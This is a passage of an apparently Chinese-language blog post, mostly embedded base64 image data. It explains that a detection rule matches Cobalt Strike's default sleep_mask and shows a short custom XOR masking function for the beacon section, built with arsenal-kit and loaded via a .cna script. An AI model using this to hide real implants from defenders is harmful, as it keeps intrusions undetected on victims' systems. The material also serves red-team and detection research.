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
</p>
<p>不是说sleep_mask会屏蔽自己吗？其实这项规则恰恰匹配的就是sleep_mask屏蔽的方法，如下图所示</p>
<img src=data:image/jpeg;base64,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
<p>使用arsenal-kit的sleepmask进行配置</p>
<p>在common_mask.c中自定义我们的算法</p>
<div class=highlight><pre tabindex=0 style=color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#8b949e;font-style:italic>/* My a beacon section
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-style:italic> *   First call will mask
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-style:italic> *   Second call will unmask
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-style:italic> */</span>
</span></span><span style=display:flex><span><span style=color:#ff7b72>void</span> <span style=color:#d2a8ff;font-weight:bold>my_mask_section</span>(SLEEPMASKP <span style=color:#ff7b72;font-weight:bold>*</span> parms, DWORD a, DWORD b) {
</span></span><span style=display:flex><span>   <span style=color:#ff7b72>char</span> key[] <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#a5d6ff>"cf81d743beef8422"</span>;
</span></span><span style=display:flex><span>   <span style=color:#ff7b72>size_t</span> key_lenght <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#ff7b72>sizeof</span>(key) <span style=color:#ff7b72;font-weight:bold>-</span> <span style=color:#a5d6ff>1</span>;
</span></span><span style=display:flex><span>   <span style=color:#ff7b72>while</span> (a <span style=color:#ff7b72;font-weight:bold>&lt;</span> b) {
</span></span><span style=display:flex><span>      <span style=color:#ff7b72;font-weight:bold>*</span>(parms<span style=color:#ff7b72;font-weight:bold>-&gt;</span>beacon_ptr <span style=color:#ff7b72;font-weight:bold>+</span> a) <span style=color:#ff7b72;font-weight:bold>^=</span> key[a <span style=color:#ff7b72;font-weight:bold>%</span> key_lenght];
</span></span><span style=display:flex><span>      a<span style=color:#ff7b72;font-weight:bold>++</span>;
</span></span><span style=display:flex><span>   }
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p><img loading=lazy src=data:image/png;base64,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
</p>
<p>最后重新构建并重新加载.cna脚本，以使更改生效</p>
<p><img loading=lazy src="data:image/png;base64,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